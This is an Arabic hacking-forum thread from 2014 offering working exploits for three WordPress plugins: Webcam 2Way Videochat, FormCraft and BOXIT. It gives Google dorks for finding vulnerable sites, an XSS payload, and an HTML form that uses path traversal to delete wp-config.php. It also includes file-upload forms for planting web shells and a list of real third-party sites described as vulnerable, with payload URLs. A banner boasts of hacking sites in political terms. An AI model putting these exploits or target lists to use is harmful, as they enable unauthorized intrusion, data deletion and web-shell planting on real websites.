1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ ثغره ] بعض ثغرات الووردبرس - Wordpress

الموضوع في '[ ثــغـرات الأعــضــاء]' بواسطة ViRuS TER0N, بتاريخ ‏11 نوفمبر 2014.

كاتب الموضوع : ViRuS TER0N المشاهدات : 491 الردود : 1 ‏11 نوفمبر 2014
  1. غير متصل

    ViRuS TER0N
    DeveloPer Plus

    عضو منذ:
    ‏28 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    [​IMG]

    السلام عليكم ورحمة الله وبركاته

    كيف الحال ان شاء الله بخير


    بعض ثغرات الووردبرس من آكتشاف NULL Pointer حبيت اطرحها للفائده

    1 - Wordpress Plugin Webcam 2Way Videochat XSS Vulnerability

    Google Dork :

    كود PHP:
    inurl:"/wp-content/plugins/webcam-2way-videochat/"


    الثغرة في الملف webcam-2way-videochat.php في السطر 609 :

    كود PHP:
    default:echo $_GET['task'] . '&ajax=';


    الإستغلال :

    كود PHP:
    http://127.0.0.1/wp-admin/admin-ajax.php?action=v2wvc&task=/*XSS_HERE*/


    بعض المواقع المصابة :

    http://bogovete.com/wp-admin/admin-ajax.php?action=v2wvc&task=<script>alert(/NULL_Pointer/)</script>
    https://pikaritas.com/wp-admin/admi...c&task=<script>alert(/NULL_Pointer/)</script>
    http://zhangzining.net/wordpress/wp...c&task=<script>alert(/NULL_Pointer/)</script>
    http://www.videochat-scripts.com/wp...c&task=<script>alert(/NULL_Pointer/)</script>

    2 - Wordpress Plugin FormCraft Premium Arbitrary File Deletion Vulnerability

    لحذف أي ملف من السيرفر

    Google Dork :

    كود PHP:
    inurl:"/wp-content/plugins/formcraft/"
    الثغرة في الملف function.php في السطر 512 :

    كود PHP:
        if (isset($_POST['name']))
        {
            
    $file_name get_home_path().'wp-content/plugins/formcraft/file-upload/server/php/files/'.$_POST['name'];
            if (
    is_file($file_name))
            {
                
    unlink($file_name);
                echo 
    "Deleted";
            }
            else
            {
                echo 
    "Not";
            }
        } 
    الإستغلال :

    مثال لحذف ملف الكونفيق wp-config.php

    كود PHP:
    <!--
    By NULL_Pointer
    -->
    <
    form action="http://127.0.0.1/wp-admin/admin-ajax.php?action=formcraft_delete_file" method="POST">
    <
    input name="name" value="../../../../../../../wp-config.php">
    <
    input type="submit" value="Delete It">
    </
    form>
    الثغرة في الملف upload.php

    الإستغلال :

    كود PHP:
    <!--
    By NULL_Pointer
    -->
    <
    form action="http://127.0.0.1/wp-content/plugins/boxit-2/upload.php" method="POST" enctype="multipart/form-data">
    <
    input type="file" name="qqfile">
    <
    input type="submit" value="Upload">
    </
    form>
    لإستعراض الشل، نروح للمسار هذا

    http://127.0.0.1/wp-content/plugins/boxit-2/tmp/

    بعض المواقع المصابة :

    Print Bureau - Digital and Lithographic Printing In Hebden Bridge | Sowerby Bridge | Halifax | West Yorkshire
    Freisteller - gأ¼nstig Bilder freistellen lassen - picperfect,de

    4 - WordPress Plugin BOXIT File Upload Vulnerability

    الثغرة في الملف boxit.php عند الدالة boxit_uploader_process في السطر 549.

    الإستغلال :

    كود PHP:
    <!--
    By NULL_Pointer
    -->
    <
    form action="http://127.0.0.1/wp-admin/admin-ajax.php?action=wpud_uploader_process" method="POST" enctype="multipart/form-data">
    <
    input type="file" name="files">
    <
    input type="submit" value="Upload">
    </
    form>
    http://127.0.0.1/wp-content/plugins/boxit/tmp/

    بعض المواقع المصابة :

    Center for Chemistry Education | Miami University

    وهذه روابط لتحميل الPlugins لمن أراد فحصها أكثر :

    Webcam 2 Way Videochat 4.41
    Webcam 2 Way Videochat 4.41

    FormCraft 2.0.5
    FormCraft 2.0.5

    BOXIT 2.0.2
    BOXIT 2.0.2

    BOXIT
    BOXIT

    بالتوفيق للجميع والسلام عليكم ورحمة الله وبركاته
     


    جاري تحميل الصفحة...
  2. غير متصل

    сомαиdα
    rank
    Developer

    عضو منذ:
    ‏29 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: بعض ثغرات الووردبرس - Wordpress

    وعليكم السلام

    يعطيك العافية

    مجهود رائع
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...